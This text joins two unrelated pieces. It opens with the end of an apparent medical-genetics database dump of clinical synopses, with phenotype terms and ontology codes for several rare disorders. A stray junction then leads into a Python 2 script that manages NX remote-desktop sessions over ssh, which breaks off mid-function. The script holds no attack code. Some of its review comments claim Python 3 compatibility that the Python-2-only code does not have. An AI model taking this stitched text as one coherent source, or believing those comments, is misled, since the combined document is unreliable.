'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': True,
'abdomenLiverExists': True,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': True,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': True,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': True,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': True,
'muscleSoftTissueExists': True,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': True,
'hematologyExists': False,
'immunologyExists': True,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': True,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613385,
'prefix': '#',
'preferredTitle': 'AUTOIMMUNE DISEASE, MULTISYSTEM, WITH FACIAL DYSMORPHISM; ADMFD',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'growthHeight': 'Below 3rd percentile {UMLS C3278794}',
'growthWeight': 'Below 3rd percentile {UMLS C3278794}',
'headAndNeckHead': '''Macrocephaly, relative {SNOMEDCT:3961000119101} {UMLS C1849075 HP:0004482} {HPO HP:0004482 C1849075};\nDolichocephaly {SNOMEDCT:72239002} {ICD10CM:Q67.2} {UMLS C0221358 HP:0000268} {HPO HP:0000268 C0221358,C4280653,C4280654,C4280655,C4280656} {EOM ID:e09c1185a1ef3e38 IMG:Dolichocephaly-small.jpg};\nProminent occiput {UMLS C1853737 HP:0000269} {HPO HP:0000269 C1853737,C4280652} {EOM ID:be559f6b4bd52c20 IMG:Occiput,Prominent-small.jpg};\nFrontal bossing {SNOMEDCT:90145001} {UMLS C0221354 HP:0002007} {HPO HP:0002007 C0221354} {EOM ID:a223995bdef3e8d6 IMG:Frontal_Bossing-small.jpg}''',
'headAndNeckFace': '''Flattened midface {UMLS C3278797};\nSmall chin {UMLS C1839323 HP:0000331} {HPO HP:0000331 C1839323,C3697248}''',
'headAndNeckEars': '''Low-set ears {SNOMEDCT:95515009} {ICD10CM:Q17.4} {UMLS C0239234 HP:0000369} {HPO HP:0000369 C0239234};\nPosteriorly rotated ears {SNOMEDCT:253251006} {UMLS C0431478 HP:0000358} {HPO HP:0000358 C0431478}''',
'headAndNeckEyes': 'Proptosis {SNOMEDCT:18265008} {ICD10CM:H05.20} {ICD9CM:376.30} {UMLS C0015300 HP:0000520} {HPO HP:0000520 C0015300,C1837760,C1848490,C1862425} {EOM ID:765f49f1e824f0d2 IMG:Proptosis-small.jpg}',
'respiratoryLung': '''Pneumonitis, cellular, nonspecific interstitial {UMLS C2750127};\nSevere chronic lung disease {UMLS C3278799};\nRespiratory failure, fatal (in some patients) {UMLS C3278800}''',
'abdomenLiver': 'Hepatomegaly {SNOMEDCT:80515008} {ICD10CM:R16.0} {ICD9CM:789.1} {UMLS C0019209 HP:0002240} {HPO HP:0002240 C0019209}',
'abdomenSpleen': 'Splenomegaly {SNOMEDCT:16294009} {ICD10CM:R16.1} {ICD9CM:789.2} {UMLS C0038002 HP:0001744} {HPO HP:0001744 C0038002}',
'abdomenGastrointestinal': '''Enteropathy, autoimmune (in some patients) {UMLS C3278795};\nChronic diarrhea (in some patients) {UMLS C3278796} {HPO HP:0002028 C0401151}''',
'skeletalHands': '''Camptodactyly {SNOMEDCT:29271008} {UMLS C0221369,C0685409 HP:0012385} {HPO HP:0012385 C0685409} {EOM ID:e2dc697e402380a8 IMG:Camptodactyly-large-small.jpg};\nClinodactyly {SNOMEDCT:17268007} {UMLS C4551485,C0265610 HP:0030084,HP:0040019} {HPO HP:0030084 C0265610,C4280304} {EOM ID:483af428f909c76c IMG:Clinodactyly-small.jpg}''',
'neurologicCentralNervousSystem': '''Psychomotor delay {SNOMEDCT:398991009,224958001} {ICD10CM:F88} {UMLS C0424230,C0557874 HP:0025356,HP:0001263} {HPO HP:0001263 C0557874,C1864897,C4020875};\nGlobal hypotonia {UMLS C3278793}''',
'endocrineFeatures': '''Hypothyroidism, autoantibody-positive (in some patients) {UMLS C3278791};\nDiabetes mellitus, type 1 (rare) {UMLS C3278792}''',
'molecularBasis': 'Caused by mutation in the homolog of the mouse itchy gene (ITCH, {606409.0001})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': True,
'growthWeightExists': True,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': True,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': True,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': True,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': True,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': True,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': True,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': True,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': True,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': False,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613328,
'preferredTitle': 'ROIFMAN-CHITAYAT SYNDROME',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckFace': '''Hypoplastic supraorbital ridges {UMLS C1861869 HP:0009891} {HPO HP:0009891 C1861869,C4020777} {EOM ID:c86a7dfe73086e4e IMG:Supraorbital_Ridges,Underdeveloped-small.jpg};\nSquare chin {UMLS C3150515}''',
'headAndNeckEyes': '''Lacrimal duct stenosis {SNOMEDCT:231841004} {UMLS C0238300 HP:0007678} {HPO HP:0007678 C0238300};\nThin optic nerves {UMLS C3151694};\nPuffy and droopy eyelids {UMLS C3150517};\nHypertelorism {SNOMEDCT:22006008} {ICD10CM:Q75.2} {ICD9CM:376.41} {UMLS C0020534 HP:0000316} {HPO HP:0000316 C0020534} {EOM ID:71d9f1be67c7f8b6 IMG:Eyes,Widely_Spaced-small.jpg}''',
'headAndNeckNose': '''Flat nasal bridge {UMLS C1836542 HP:0005280} {HPO HP:0005280 C1836542,C3550546,C4280495} {EOM ID:000fb29123c16757 IMG:Nasal_Bridge,Depressed-small.jpg};\nBroad nasal root {SNOMEDCT:249321001} {UMLS C1849367 HP:0000431} {HPO HP:0000431 C1839764,C1849367}''',
'headAndNeckMouth': 'Thin lower lip {UMLS C2053440 HP:0010282} {HPO HP:0010282 C2053440}',
'headAndNeckNeck': 'Short neck {SNOMEDCT:95427009} {UMLS C0521525 HP:0000470} {HPO HP:0000470 C0521525} {EOM ID:c75e63fd749ec7a8 IMG:Neck,Short-small.jpg}',
'cardiovascularVascular': 'Aberrant subclavian artery {SNOMEDCT:93353003} {UMLS C0431498}',
'respiratoryAirways': 'Pneumonia {SNOMEDCT:233604007} {UMLS C0032285 HP:0002090} {HPO HP:0002090 C0032285}',
'abdomenExternalFeatures': 'Umbilical hernia {SNOMEDCT:396347007,5867007} {ICD10CM:Q79.2,K42,K42.9} {ICD9CM:553.1} {UMLS C1306503,C0041636,C0019322 HP:0001537} {HPO HP:0001537 C0019322}',
'abdomenGastrointestinal': 'Esophageal dyskinesia {SNOMEDCT:79962008,266434009} {ICD10CM:K22.4} {ICD9CM:530.5} {UMLS C0014858}',
'genitourinaryKidneys': 'Cross-fused renal ectopia {UMLS C1835796 HP:0004736}',
'skeletal': '''Osteopenia {SNOMEDCT:312894000,78441005} {UMLS C0029453 HP:0000938} {HPO HP:0000938 C0029453,C0747078};\nCone-shaped epiphyses {UMLS C1865037 HP:0010579} {HPO HP:0010579 C1865037}''',
'skeletalHands': 'Short metacarpals {UMLS C1837084 HP:0010049} {HPO HP:0010049 C1837084}',
'skeletalFeet': 'Short metatarsals {UMLS C1849020 HP:0010743} {HPO HP:0010743 C1849020}',
'neurologicCentralNervousSystem': '''Myoclonic seizures {SNOMEDCT:37356005} {UMLS C4317123,C0014550 HP:0002123} {HPO HP:0002123 C0014550,C0751778,C4021759};\nDevelopmental delay {SNOMEDCT:248290002,224958001} {ICD10CM:F88} {ICD9CM:315.9} {UMLS C0424605,C0557874 HP:0001263} {HPO HP:0001263 C0557874,C1864897,C4020875};\nDilated ventricles {SNOMEDCT:6210001} {ICD10CM:I51.7} {UMLS C0264733,C3278923 HP:0002119} {HPO HP:0002119 C3278923}''',
'immunology': '''Repeated invasive infections {UMLS C3150518};\nArthritis {SNOMEDCT:3723001} {ICD10CM:M19.90} {UMLS C4552845,C0003864 HP:0001369} {HPO HP:0001369 C0003864};\nNormal or elevated lymphocytes {UMLS C3150519};\nLow T-cell function {UMLS C3150520};\nLow IgG with antibody deficiency {UMLS C3150521}''',
'miscellaneous': 'One family with 2 sisters have been reported (as of March 2010) {UMLS C3150522}',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': True,
'headAndNeckMouthExists': True,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': True,
'cardiovascularExists': True,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': True,
'respiratoryExists': True,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': True,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': True,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': True,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': True,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': True,
'skeletalFeetExists': True,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': True,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': False,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613387,
'prefix': '%',
'preferredTitle': 'FATTY LIVER DISEASE, NONALCOHOLIC, SUSCEPTIBILITY TO, 2; NAFLD2',
'inheritance': 'Multifactorial {UMLS C1837655}',
'abdomenLiver': 'Fatty liver (hepatic steatosis), nonalcoholic {UMLS C3278766}',
'miscellaneous': 'Genetic heterogeneity {UMLS C0242960 HP:0001425} {HPO HP:0001425 C0242960}',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': True,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': False,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613329,
'prefix': '#',
'preferredTitle': 'PLASMINOGEN ACTIVATOR INHIBITOR-1 DEFICIENCY',
'inheritance': '''Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899};\nAutosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}''',
'hematology': '''Increased bleeding after trauma, surgery, or injury {UMLS C3278771};\nHematomas after trauma or injury {UMLS C3278772};\nBleeding defect due to decreased plasminogen activator inhibitor-1 {UMLS C3278773};\nDecreased euglobin lysis time {UMLS C3278774};\nIncreased fibrinolysis {SNOMEDCT:89470004} {UMLS C0151648,C2314905};\nMenorrhagia {SNOMEDCT:386692008} {ICD10CM:N92.0} {UMLS C0025323,C4553737 HP:0000132} {HPO HP:0000132 C0025323}''',
'miscellaneous': '''Congenital onset {UMLS C1836142 HP:0003577} {HPO HP:0003577 C1836142,C2752013};\nSpontaneous bleeding is rare {UMLS C3278776};\nFavorable management with the fibrinolysis inhibitors (e.g., epsilon-aminocaproic acid and tranexamic acid) {UMLS C3278777}''',
'molecularBasis': 'Caused by mutation in the serpin peptidase inhibitor, clade E, member 1 gene (SERPINE1, {173360.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': True,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
}
} ]
}
} } |
#!/usr/bin/env python
# coding: UTF-8
"""Usage: %prog [OPTIONS] host:<DISPLAY#>
View the NX session <DISPLAY#> on host. If it is not running, it will be
started, and ~/.nxstartup will be executed by the shell.
See the source code for more information.
"""
# This script handles starting and reconnecting to an NX session over
# an encrypted ssh connection. It replaces the 'FreeNX' package.
#
# - There is no GUI. Does not work with standard client.
# - Sound and file sharing are not handled
# - Does not add a user with a widely-known ssh private key to the system
# - Uses the installed system ssh, so that custom PAM modules on the server
# (e.g. RSA SecurID) will work
# - Only requires 'nxproxy' somewhere on PATH and an X server on the
# client, and 'nxagent' somewhere on PATH on the server
# - Magic cookies are not left world-readable
# - ssh port forwardings are secured
# TODO:
# [ ] Figure out the issues with resuming a session on a display different
# from the one on which it was started, e.g. connect from a client
# running in Xvnc and in Windows.
# [ ] Change compression parameters on resuming a session
# Outline of script:
# ssh to terminal host
# Start terminal server if not running
# Send cookie to terminal client
# Start terminal client
# The NX protocol passes over the ssh connection, so it is encrypted and
# you don't have to worry about firewalls.
# The terminology and various pieces of stuff can get quite confusing. The
# page titled "Building and Using NX Open Source Components" on the web
# (http://www.nomachine.com/documents/technology/building-components-3.1.0.php)
# describes it, but not in a way that was at all clear to me, and there is
# a general lack of documentation that I will try to rectify here.
#
# In X11, display clients receive keystrokes and send draw messages to a
# display server, which normally has a physical keyboard and display.
#
# Display Client -- xterm
# ↕
# Display Server -- monitor and keyboard
#
# The first component that NX provides is nxproxy, which compresses the X
# protocol, so that the connection uses less bandwidth. It is transparent
# to the applications that pass their data through it. Logically:
#
# Display Client -- xterm
# ↕
# nxproxy
# ↕
# Display Server -- monitor and keyboard
#
# and physically
#
# Display Client -- xterm
# ↕
# nxproxy client
# ↕
# <Narrow link>
# ↕
# nxproxy server
# ↕
# Display Server -- monitor and keyboard
#
# Each piece could be on a physically distinct machine. To start a proxy
# display :4 connecting to the proxy server on port 4004 which then
# draws on the physical display :0 (X display $n is generally accessible as
# TCP port 600n. NX defaults to using 400n for the TCP port serving NX
# protocol.)
#
# # On proxy server
# DISPLAY="${DISPLAY_SERVER}:0" nxproxy -s :4 listen=4004
#
# # On proxy client, start serving X protocol on port 6004
# nxproxy -C "${PROXY_SERVER}:4" port=4004
#
# # On display client, start client
# DISPLAY="${PROXY_CLIENT}:4" xterm
#
# The X messages from the xterm are sent to the proxy client listening on
# TCP port 6004, which compresses them and sends them to the proxy server
# listening on TCP port 4004, which decompresses them and sends them to the
# physical display server.
#
# This reduces the total bandwidth requirements. Bandwidth can also be
# reduced by configuring nxproxy to cache, downsample, and lossily compress
# images.
#
# However this is still a bit slow. X applications are developed on the
# same machine, or at least the same local network, as their servers. There
# are still many round-trips of no visual importance between the client and
# the server, e.g. to get window properties or look up atoms. In addition
# to reducing bandwidth, latency can be reduced by sending only X traffic
# corresponding to visual updates.
#
# There is a program called Xnest that draws a window with a new X display
# inside. If this is placed between the X applications and the physical
# display, only traffic corresponding to visual updates needs to be sent.
#
# Display Client -- xterm
# ↕
# Xnest display server
# Xnest client
# ↕
# nxproxy client
# ↕
# <Slow, narrow link>
# ↕
# nxproxy server
# ↕
# Display Server -- monitor and keyboard
#
# In this configuration, most X protocol request are handled immediately by
# the Xnest server. Visual updates get compressed and sent to the physical
# display server.
#
# NX provides a program, nxagent, based on Xnest, that is an X server, an X
# client, and an nxproxy client -- all the parts corresponding to the
# remote side of the link. When an nxproxy server connects to an nxagent
# instance, nxagent sends the X messages to draw a window, paints the
# current display image, and then starts sending screen updates as they
# occur. These updates are all in X protocol, so they are fairly efficient
# -- to draw a string, it is enough to send the text and the font name,
# which will compress well.
#
# This script runs on the physical display server. It will:
# - Start nxagent on the remote host
# nxagent -display nx/nx,listen=4008:8 :8
# - Start a proxy server on the local host
# nxproxy -S remote:8
# When the proxy server connects to the remote nxagent, nxagent will draw
# the virtual display on the local display.
#
# Reasons this script isn't just those two lines:
# - nxagent has to be started if it isn't running
# - it has to be HUPed if it is
# - (unless it's already waiting for a connection)
# - &c.
# - the above setup lets anyone connect to the display and install a
# keylogger
# - the above setup doesn't encrypt any data, so someone wouldn't even
# have to connect to your display to log your keystrokes
# - &c.
from __future__ import with_statement
from __future__ import division
from optparse import OptionParser
import os
from path import path
import pwd
import re
import signal
import socket
import subprocess
import sys
import time
# Sentinel printed in place of a cookie by server mode (set in
# LocalNXAgent.start, checked in main) to signal that nxagent
# failed to start.
FAILURE_SENTINEL = 'Crumbled.'
def cmd_from_pid(pid):
    """Return the command name (argv[0]) of process *pid*, or None.

    Reads /proc/<pid>/cmdline, so it only yields a name on Linux-style
    /proc filesystems; any I/O failure (no such pid, no /proc,
    unreadable file) returns None rather than raising.
    """
    try:
        with open('/proc/%d/cmdline' % pid, 'r') as f:
            cmdline = f.read()
        # Arguments in /proc/*/cmdline are NUL-separated; the first
        # field is the command name.
        return cmdline.split('\0', 1)[0]
    except EnvironmentError:
        # Narrowed from a bare `except:` so programming errors (e.g. a
        # non-integer pid raising TypeError) are no longer swallowed.
        # EnvironmentError covers IOError/OSError on Python 2 and 3.
        return None
def get_nx_root():
    """Return the NX state directory: $NX_ROOT if set, else ~/.nx."""
    default_root = path('~').expanduser().joinpath('.nx')
    return os.getenv('NX_ROOT', default_root)
def write_options(filename, options, display):
    """Write an nxagent/nxproxy options file for *display*.

    File format: 'k1=v1,k2=v2,...:<display>' (the inverse of
    split_option_str, plus the trailing display number).
    """
    with open(filename, 'w') as f:
        # items() instead of the Python-2-only iteritems(): identical
        # behavior on py2, and keeps the helper working on py3.
        f.write(','.join('%s=%s' % (k, v)
                         for k, v in options.items()))
        f.write(':%d' % display)
def split_option_str(optionstr):
    """Parse 'foo=bar,baz=wtf' into {'foo': 'bar', 'baz': 'wtf'}.

    Only the first '=' in each comma-separated chunk splits key from
    value, so values may themselves contain '='.
    """
    pairs = (chunk.split('=', 1) for chunk in optionstr.split(','))
    return dict(pairs)
class LocalNXAgent:
    """Manage an nxagent instance on the local machine.

    Tracks the session directory (~/.nx/C-<display>), its pid file and
    options file; can start a fresh agent, detect a running one, and
    ask a running one to accept a new connection.
    """
    def __init__(self, display, extra_options=[], name=None):
        # NOTE(review): mutable default for extra_options is shared
        # across calls, but it is only iterated here, never mutated.
        self.display = display
        self.session_dir = self._get_session_dir()
        # Window title defaults to "<fqdn>:<display>".
        self.name = (name if name is not None
                else "%s:%d" % (socket.getfqdn(), display))
        # Accept only localhost connections (the encrypted ssh tunnel
        # terminates there); listen on TCP port 4000 + display.
        self.options = {
            'accept': 'localhost',
            'listen': self.port_from_display(self.display),
        }
        for optstr in extra_options:
            self.options.update(split_option_str(optstr))
        self.pid_dir = self.session_dir.joinpath('pids')
    @classmethod
    def port_from_display(cls, display):
        """
        Return the TCP port serving NX protocol corresponding to the given
        X display number.
        """
        return 4000 + display
    def _get_session_dir(self):
        # Idempotent: reuse the already-computed directory if present.
        if hasattr(self, 'session_dir'):
            return self.session_dir
        return get_nx_root().joinpath('C-%d' % self.display)
    def is_running(self):
        """Return True if the pid file names a live nxagent process.

        Side effect: sets self.pid from the pid file when readable.
        """
        try:
            pidfile = self.pid_dir.joinpath('agent')
            with open(pidfile, 'r') as f:
                self.pid = int(f.read())
        except (IOError, ValueError), e:
            # Missing or corrupt pid file: treat as not running.
            return False
        cmd = cmd_from_pid(self.pid)
        # Guard against pid reuse: the process must actually be nxagent.
        if cmd and cmd.lower().endswith('nxagent'):
            return True
        return False
    def start(self):
        """Start a fresh nxagent for this display, then run ~/.nxstartup.

        On success self.cookie holds the new X auth cookie; on startup
        failure/timeout the agent is reaped and self.cookie is set to
        FAILURE_SENTINEL.
        """
        # The options file has to be secret because it contains the cookie
        # The log files have to be secret because they'll print the
        # supplied and actual cookie on authentication failure
        # Any caches will have to be secret
        # So we just make everything secret
        os.umask(077)
        # Start from a clean session directory.
        if self.session_dir.isdir():
            self.session_dir.rmtree()
        self.session_dir.makedirs()
        # Fresh 128-bit magic cookie, registered with xauth for :display.
        self.cookie = os.urandom(16).encode('hex')
        self.options['cookie'] = self.cookie
        subprocess.check_call(
            ['xauth', 'add', ':%d' % self.display, '.', self.cookie])
        option_filename = self.session_dir.joinpath('options')
        write_options(option_filename, self.options, self.display)
        session_filename = self.session_dir.joinpath('session')
        with open(session_filename, 'w') as session_file:
            # nxagent logs to the 'session' file; the log is polled by
            # is_waiting_for_connection() below.
            process = subprocess.Popen(['nxagent', '-nokbreset',
                '-name', self.name,
                '-auth', os.path.expanduser('~/.Xauthority'),
                '-display',
                    'nx/nx,options=%s:%d' % (option_filename, self.display),
                ':%d' % self.display],
                stdout=session_file, stderr=subprocess.STDOUT)
            self.pid = process.pid
            try:
                pidfile = self.pid_dir.joinpath('agent')
                if not pidfile.parent.isdir():
                    pidfile.parent.makedirs()
                with open(pidfile, 'w') as f:
                    f.write(str(self.pid))
            except:
                # If we can't write out the pid, kill the agent right away
